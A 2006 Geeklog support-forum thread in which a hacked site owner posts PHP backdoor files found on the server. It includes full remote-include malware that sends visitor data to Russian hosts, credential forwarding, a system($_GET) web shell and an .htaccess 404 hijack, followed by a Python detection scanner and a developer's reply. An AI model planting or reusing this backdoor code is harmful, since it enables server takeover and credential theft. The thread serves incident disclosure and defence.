Posted on: 07/17/06 12:55pm
By: Anonymous (hacked)
I've recently found these files strewn throughout my system dirs by various names and .htaccess files providing redirects to them from a 404 (or something like that):
first file:
<?
error_reporting(0);
$s = "e";
// Collect details of the current request, falling back to the old
// register_globals variable names on PHP installs that still have them
$a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b = (isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e = (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f = (isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g = (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
// Base64-encode each value and join them with dots into one query string
$str = base64_encode($a) . "." . base64_encode($b) . "." . base64_encode($c) . "." . base64_encode($d) . "." . base64_encode($e) . "." . base64_encode($f) . "." . base64_encode($g) . "." . base64_encode($h) . ".$s";
// Remote include: "aHR0cDovLw==" decodes to "http://", "dXNlcjkubXNodG1sLnJ1" to
// "user9.mshtml.ru" and "dXNlcjcuaHRtbHRhZ3MucnU=" to "user7.htmltags.ru", so the
// visitor's request details are sent to those hosts and whatever PHP they return is run
if ((include(base64_decode("aHR0cDovLw==") . base64_decode("dXNlcjkubXNodG1sLnJ1") . "/?" . $str))) {
} else {
    include(base64_decode("aHR0cDovLw==") . base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=") . "/?" . $str);
}
?>
second file:
<?php
error_reporting(0);
// Credentials from a POSTed login form are forwarded to the remote server;
// "input" means they came straight from a form, so the password is md5'd first
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
// Remote include: the base64 literal decodes to "http://bis.iframe.ru/master.php?r_addr=",
// followed by the visitor's IP as an integer and the base64 of host + URI.
// REMOTE_ADDR and REQUEST_URI are written as bare constants; with error reporting off,
// PHP before 8 silently uses them as the strings "REMOTE_ADDR" and "REQUEST_URI"
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    // Fallback when the remote include fails: run any shell command passed in the
    // a3kfj39fsj2 parameter, and report the kernel version for a "special" login
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>
and the .htaccess file:
Options -MultiViews
ErrorDocument 404 /mysite/geeklogdir/plugins/someplugin/includes.php
What's up with that? How could these files have got there and what do they do? I'm deleting them as I find them. They are in a whole bunch of directories. ...and I don't have a clue how to read server logs.
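As an added example (not from this thread or from Geeklog itself), a Python script that walks a web root and flags the two patterns the post shows: PHP files that include() a base64_decode()d URL or hand request parameters to system() or backticks, and .htaccess files whose ErrorDocument points at a .php file. The files it scans are constructed here, shortened from the ones quoted above, with a clean index.php and a normal .htaccess as controls; the decoded base64 literals show where the includes actually fetch from.

```python
import base64
import os
import re
import tempfile

# Constructed samples modelled on the two PHP files and the .htaccess quoted in
# the post above (shortened, plus a clean index.php and .htaccess as controls).
SAMPLE_FILES = {
    "plugins/someplugin/includes.php": (
        '<? error_reporting(0);$str=base64_encode($_SERVER["HTTP_HOST"]);'
        'if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){}'
        ' else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>'
    ),
    "data/shell.php": (
        '<?php error_reporting(0);'
        'if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9")."&log"))'
        '{ if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}'
        ' if($_POST["l"]=="special"){print "sys_active". `uname -a`;} } ?>'
    ),
    "plugins/someplugin/.htaccess": "Options -MultiViews\nErrorDocument 404 /mysite/geeklogdir/plugins/someplugin/includes.php\n",
    "index.php": "<?php echo 'hello'; ?>",
    ".htaccess": "ErrorDocument 404 /404.html\n",
}

# Strong indicators first, weakest last.  error_reporting(0) alone is common in
# legitimate code; it only matters in combination with the others.
INDICATORS = [
    ("remote-include", re.compile(r"\b(include|include_once|require|require_once)\s*\(\s*base64_decode", re.I)),
    ("command-exec", re.compile(r"\b(system|exec|shell_exec|passthru)\s*\(\s*\$_(GET|POST|REQUEST)\b", re.I)),
    ("backtick-exec", re.compile(r"`[^`\n]+`")),
    ("error-silencing", re.compile(r"error_reporting\s*\(\s*0\s*\)")),
]
B64_LITERAL = re.compile(r'base64_decode\(\s*"([A-Za-z0-9+/=]+)"\s*\)')
# An ErrorDocument that hands 404s to a .php file is what wired the first backdoor in;
# every target found this way needs a manual look, it is not malicious by itself.
ERRORDOC_PHP = re.compile(r"^\s*ErrorDocument\s+\d{3}\s+(\S*\.php\S*)", re.M | re.I)


def decode_b64_literals(text):
    """Return the distinct decoded values of every base64_decode("...") literal."""
    seen = []
    for m in B64_LITERAL.finditer(text):
        try:
            value = base64.b64decode(m.group(1), validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if value not in seen:
            seen.append(value)
    return seen


def scan_php(text):
    """Return (matched indicator names, decoded base64 literals) for one PHP file."""
    hits = [name for name, rx in INDICATORS if rx.search(text)]
    return hits, decode_b64_literals(text)


def scan_htaccess(text):
    """Return the .php targets of every ErrorDocument directive."""
    return ERRORDOC_PHP.findall(text)


def scan_tree(root):
    """Walk a web root; return {relative path: {"indicators": [...], "decoded": [...]}}."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "r", errors="replace") as fh:
                text = fh.read()
            if name == ".htaccess":
                targets = scan_htaccess(text)
                if targets:
                    findings[rel] = {"indicators": ["errordocument-to-php"], "decoded": targets}
            elif name.lower().endswith(".php"):
                hits, decoded = scan_php(text)
                if hits:
                    findings[rel] = {"indicators": hits, "decoded": decoded}
    return findings


def run_demo():
    """Write the constructed samples into a temporary web root and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, content in SAMPLE_FILES.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write(content)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, info in sorted(run_demo().items()):
        print(rel, info["indicators"], info["decoded"])
```

Against a real install, call scan_tree() on the document root (and on any Geeklog directory kept outside it). On the files quoted in the post, the literals decode to http://user9.mshtml.ru and http://user7.htmltags.ru for the first file and http://bis.iframe.ru/master.php?r_addr= for the second, and the .htaccess sends every 404 under that directory to the first file, so any request for a URL that does not exist runs it.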
hacking a family site
Posted on: 07/17/06 03:43pm
By: Dirk
Which Geeklog version are you on?
Unfortunately, we had a few issues recently that allowed attackers to execute arbitrary code - which means that they could do just about anything, including creating or uploading new files.
bye, Dirk
hacking a family site
Posted on: 07/17/06 04:22pm
By: Anonymous (hacked)
I found the files while upgrading to 1.4sr5, but the modification date of the files shows that they were created when I was still running 1.3.11sr1.
upgrade went fine by the way.
the geeklog dir was inside the doc root, but it was (per the install instructions) renamed and password protected. The files I mentioned above were found in this password protected dir as well as many publicly accessible directories.
I found these files across 3 domains, 2 subdomains, all on the same server obviously, involving not only Geeklog installations but 2 WordPress installations as well. I found them mostly in any directories named: data; backups; logs; userphotos; articles; default; and a few others that I can't remember.
HOLY CRAP! I just found that the username and password in the config.php file (of the installation with the gl dir outside the web root) was changed. The new username was also added to the database with all privileges. wtf?!
hacking a family site
Posted on: 07/17/06 04:54pm
By: Dirk
Sounds really bad
The password protection will only help against access from the outside (e.g. via the browser), but won't help when you can run your own PHP scripts (or Geeklog itself wouldn't be able to access the files in the password-protected directories). So, as I wrote above, once you can execute your own PHP code on someone else's server, pretty much everything is possible ...
bye, Dirk